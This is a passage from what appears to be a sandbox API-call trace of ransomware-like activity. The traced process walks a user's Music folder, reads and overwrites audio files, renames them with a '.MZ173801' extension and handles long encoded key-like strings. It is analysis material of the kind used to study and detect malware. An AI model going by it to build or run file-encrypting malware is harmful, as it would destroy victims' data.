out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x9379 [0118.206] SetFilePointer (in: hFile=0x404, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0118.207] ReadFile (in: hFile=0x404, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x9379, lpNumberOfBytesRead=0x19f418, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f418*=0x9379, lpOverlapped=0x0) returned 1 [0118.208] CloseHandle (hObject=0x404) returned 1 [0118.208] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\3MH4hI_B2Y4fI4Q-s4O\\lFuTB4aA.m4a" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\3mh4hi_b2y4fi4q-s4o\\lfutb4aa.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x404 [0118.209] WriteFile (in: hFile=0x404, lpBuffer=0x243bb60*, nNumberOfBytesToWrite=0x9379, lpNumberOfBytesWritten=0x19f424, lpOverlapped=0x0 | out: lpBuffer=0x243bb60*, lpNumberOfBytesWritten=0x19f424*=0x9379, lpOverlapped=0x0) returned 1 [0118.211] CloseHandle (hObject=0x404) returned 1 [0118.213] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\3MH4hI_B2Y4fI4Q-s4O\\lFuTB4aA.m4a" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\3mh4hi_b2y4fi4q-s4o\\lfutb4aa.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\3MH4hI_B2Y4fI4Q-s4O\\lFuTB4aA.m4a.MZ173801" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\3mh4hi_b2y4fi4q-s4o\\lfutb4aa.m4a.mz173801")) returned 1 [0118.213] GetCurrentThreadId () returned 0x1358 [0118.213] GetCurrentThreadId () returned 0x1358 [0118.213] GetCurrentThreadId () returned 0x1358 [0118.213] GetCurrentThreadId () returned 0x1358 [0118.213] GetCurrentThreadId () returned 0x1358 [0118.213] GetCurrentThreadId () returned 0x1358 [0118.213] FindNextFileW (in: hFindFile=0xa1bcb0, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd56c7e80, ftCreationTime.dwHighDateTime=0x1d5e0d9, ftLastAccessTime.dwLowDateTime=0xb9b6eed0, ftLastAccessTime.dwHighDateTime=0x1d5ed83, ftLastWriteTime.dwLowDateTime=0xb9b6eed0, ftLastWriteTime.dwHighDateTime=0x1d5ed83, nFileSizeHigh=0x0, nFileSizeLow=0x182c, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="rAI6kR Z24Gt07MNyb.wav", cAlternateFileName="RAI6KR~1.WAV")) returned 1 [0118.213] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0118.213] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0118.213] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\3MH4hI_B2Y4fI4Q-s4O\\rAI6kR Z24Gt07MNyb.wav" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\3mh4hi_b2y4fi4q-s4o\\rai6kr z24gt07mnyb.wav"), fInfoLevelId=0x0, lpFileInformation=0x19f458 | out: lpFileInformation=0x19f458*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd56c7e80, ftCreationTime.dwHighDateTime=0x1d5e0d9, ftLastAccessTime.dwLowDateTime=0xb9b6eed0, ftLastAccessTime.dwHighDateTime=0x1d5ed83, ftLastWriteTime.dwLowDateTime=0xb9b6eed0, ftLastWriteTime.dwHighDateTime=0x1d5ed83, nFileSizeHigh=0x0, nFileSizeLow=0x182c)) returned 1 [0118.214] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0118.214] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0118.214] GetCurrentThreadId () returned 0x1358 [0118.214] GetCurrentThreadId () returned 0x1358 [0118.214] GetCurrentThreadId () returned 0x1358 [0118.215] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0118.215] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0118.215] GetCurrentThreadId () returned 0x1358 [0118.215] GetCurrentThreadId () returned 0x1358 [0118.215] GetCurrentThreadId () returned 0x1358 [0118.215] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\3MH4hI_B2Y4fI4Q-s4O\\rAI6kR Z24Gt07MNyb.wav" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\3mh4hi_b2y4fi4q-s4o\\rai6kr z24gt07mnyb.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x404 [0118.215] SetFilePointer (in: hFile=0x404, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f40c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f40c*=0) returned 0x0 [0118.216] SetFilePointer (in: hFile=0x404, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0118.216] SetFilePointer (in: hFile=0x404, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x182c [0118.216] SetFilePointer (in: hFile=0x404, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0118.216] ReadFile (in: hFile=0x404, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x182c, lpNumberOfBytesRead=0x19f418, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f418*=0x182c, lpOverlapped=0x0) returned 1 [0118.217] CloseHandle (hObject=0x404) returned 1 [0118.217] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\3MH4hI_B2Y4fI4Q-s4O\\rAI6kR Z24Gt07MNyb.wav" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\3mh4hi_b2y4fi4q-s4o\\rai6kr z24gt07mnyb.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x404 [0118.218] WriteFile (in: hFile=0x404, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x182c, lpNumberOfBytesWritten=0x19f424, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f424*=0x182c, lpOverlapped=0x0) returned 1 [0118.219] CloseHandle (hObject=0x404) returned 1 [0118.220] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\3MH4hI_B2Y4fI4Q-s4O\\rAI6kR Z24Gt07MNyb.wav" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\3mh4hi_b2y4fi4q-s4o\\rai6kr z24gt07mnyb.wav"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\3MH4hI_B2Y4fI4Q-s4O\\rAI6kR Z24Gt07MNyb.wav.MZ173801" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\3mh4hi_b2y4fi4q-s4o\\rai6kr z24gt07mnyb.wav.mz173801")) returned 1 [0118.220] GetCurrentThreadId () returned 0x1358 [0118.221] GetCurrentThreadId () returned 0x1358 [0118.221] GetCurrentThreadId () returned 0x1358 [0118.221] GetCurrentThreadId () returned 0x1358 [0118.221] GetCurrentThreadId () returned 0x1358 [0118.221] GetCurrentThreadId () returned 0x1358 [0118.221] FindNextFileW (in: hFindFile=0xa1bcb0, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd56c7e80, ftCreationTime.dwHighDateTime=0x1d5e0d9, ftLastAccessTime.dwLowDateTime=0xb9b6eed0, ftLastAccessTime.dwHighDateTime=0x1d5ed83, ftLastWriteTime.dwLowDateTime=0xb9b6eed0, ftLastWriteTime.dwHighDateTime=0x1d5ed83, nFileSizeHigh=0x0, nFileSizeLow=0x182c, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="rAI6kR Z24Gt07MNyb.wav", cAlternateFileName="RAI6KR~1.WAV")) returned 0 [0118.221] GetLastError () returned 0x12 [0118.221] FindClose (in: hFindFile=0xa1bcb0 | out: hFindFile=0xa1bcb0) returned 1 [0118.221] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\3MH4hI_B2Y4fI4Q-s4O\\*.*", lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb4635c0, ftCreationTime.dwHighDateTime=0x1d5ea0b, ftLastAccessTime.dwLowDateTime=0xa7bc50a4, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa7bc50a4, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName=".", cAlternateFileName="")) returned 0xa1bc78 [0118.221] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c8 | out: lpLocalFileTime=0x19f4c8) returned 1 [0118.221] FileTimeToDosDateTime (in: lpFileTime=0x19f4c8, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0118.221] FindNextFileW (in: hFindFile=0xa1bc78, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb4635c0, ftCreationTime.dwHighDateTime=0x1d5ea0b, ftLastAccessTime.dwLowDateTime=0xa7bc50a4, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa7bc50a4, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="..", cAlternateFileName="")) returned 1 [0118.221] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0118.221] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0118.221] FindNextFileW (in: hFindFile=0xa1bc78, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe06419c0, ftCreationTime.dwHighDateTime=0x1d5e2cc, ftLastAccessTime.dwLowDateTime=0xe448e0e0, ftLastAccessTime.dwHighDateTime=0x1d5ead6, ftLastWriteTime.dwLowDateTime=0xa7772b8a, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0xd5da, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="0ANPHQ2sWdNCoQ54jO.m4a.MZ173801", cAlternateFileName="0ANPHQ~1.MZ1")) returned 1 [0118.222] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0118.222] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0118.222] FindNextFileW (in: hFindFile=0xa1bc78, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc66dc60, ftCreationTime.dwHighDateTime=0x1d5e338, ftLastAccessTime.dwLowDateTime=0x408334a0, ftLastAccessTime.dwHighDateTime=0x1d5e9c4, ftLastWriteTime.dwLowDateTime=0xa7798ef0, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x9c3b, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="0Ctn.m4a.MZ173801", cAlternateFileName="0CTNM4~1.MZ1")) returned 1 [0118.222] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0118.222] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0118.222] FindNextFileW (in: hFindFile=0xa1bc78, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x347b5890, ftCreationTime.dwHighDateTime=0x1d5e997, ftLastAccessTime.dwLowDateTime=0x462166a0, ftLastAccessTime.dwHighDateTime=0x1d5e29b, ftLastWriteTime.dwLowDateTime=0xa7b78a48, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x165a2, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="0L-oxNwdFYy.wav.MZ173801", cAlternateFileName="0L-OXN~1.MZ1")) returned 1 [0118.222] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0118.222] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0118.222] FindNextFileW (in: hFindFile=0xa1bc78, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f7058e0, ftCreationTime.dwHighDateTime=0x1d5ed30, ftLastAccessTime.dwLowDateTime=0x368b2c00, ftLastAccessTime.dwHighDateTime=0x1d5e163, ftLastWriteTime.dwLowDateTime=0xa7b78a48, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x92a7, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="cbJumAv3Kocmj1zm.m4a.MZ173801", cAlternateFileName="CBJUMA~1.MZ1")) returned 1 [0118.222] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0118.222] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0118.222] FindNextFileW (in: hFindFile=0xa1bc78, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa738b950, ftCreationTime.dwHighDateTime=0x1d5e883, ftLastAccessTime.dwLowDateTime=0x56830880, ftLastAccessTime.dwHighDateTime=0x1d5ee50, ftLastWriteTime.dwLowDateTime=0xa7b9f4b3, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x6d0f, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="hMFp.mp3.MZ173801", cAlternateFileName="HMFPMP~1.MZ1")) returned 1 [0118.222] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0118.222] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0118.222] FindNextFileW (in: hFindFile=0xa1bc78, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34899570, ftCreationTime.dwHighDateTime=0x1d5eac0, ftLastAccessTime.dwLowDateTime=0x41b39940, ftLastAccessTime.dwHighDateTime=0x1d5e0fb, ftLastWriteTime.dwLowDateTime=0xa7bc50a4, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x9379, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="lFuTB4aA.m4a.MZ173801", cAlternateFileName="LFUTB4~1.MZ1")) returned 1 [0118.222] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0118.222] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0118.222] FindNextFileW (in: hFindFile=0xa1bc78, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd56c7e80, ftCreationTime.dwHighDateTime=0x1d5e0d9, ftLastAccessTime.dwLowDateTime=0xb9b6eed0, ftLastAccessTime.dwHighDateTime=0x1d5ed83, ftLastWriteTime.dwLowDateTime=0xa7bc50a4, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x182c, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="rAI6kR Z24Gt07MNyb.wav.MZ173801", cAlternateFileName="RAI6KR~1.MZ1")) returned 1 [0118.222] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0118.222] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0118.222] FindNextFileW (in: hFindFile=0xa1bc78, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd56c7e80, ftCreationTime.dwHighDateTime=0x1d5e0d9, ftLastAccessTime.dwLowDateTime=0xb9b6eed0, ftLastAccessTime.dwHighDateTime=0x1d5ed83, ftLastWriteTime.dwLowDateTime=0xa7bc50a4, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, 